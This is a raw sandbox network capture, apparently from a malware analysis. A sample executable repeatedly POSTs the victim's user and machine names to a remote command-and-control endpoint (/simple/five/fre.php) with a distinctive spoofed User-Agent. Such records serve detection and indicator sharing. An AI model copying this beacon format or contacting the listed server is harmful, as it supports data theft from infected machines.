Jan 11, 2025 01:42:27.702923059 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:27 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49711	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:28.130974054 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:28.135809898 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:28.855298042 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:28 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49712	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:29.014556885 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:29.019551039 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:29.739046097 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:29 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49713	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:29.885778904 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:29.891717911 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:30.609095097 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:30 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49714	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:31.079433918 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:31.084444046 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:31.824528933 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:31 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49715	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:31.987454891 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:31.992422104 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:32.733211994 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:32 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49716	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:32.884510994 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:32.889368057 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:33.590639114 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:33 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49717	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:34.060091019 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:34.065162897 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:34.808461905 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:34 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49718	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:34.964698076 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:34.969892025 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:35.673820019 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:35 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49720	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:35.843321085 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:35.848201990 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:36.597086906 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:36 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49722	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:36.751585007 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:36.756536007 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:37.453332901 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:37 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49723	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:37.611859083 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:37.616844893 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:38.373198032 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:38 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49724	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:38.529992104 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:38.534914017 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:39.300244093 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:39 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	49725	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:39.448384047 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:39.453289986 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:40.181978941 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:40 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	49726	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:40.347589016 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:40.352447987 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:41.051228046 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:40 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.8	49727	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:41.202259064 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:41.207139015 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:41.903986931 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:41 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.8	49728	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:42.064344883 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:42.069380999 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:42.789096117 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:42 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.8	49729	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:42.974584103 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:42.979512930 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:43.879904985 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:43 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.8	49730	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:44.025429010 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:44.030364990 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:44.715174913 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:44 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.8	49731	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:44.873852015 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:44.878655910 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:45.597421885 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:45 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.8	49732	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:45.906074047 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:45.910981894 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:46.616846085 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:46 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.8	49733	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:46.762074947 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:46.766963005 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:47.494050980 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:47 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.8	49734	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:47.671560049 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:47.676875114 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
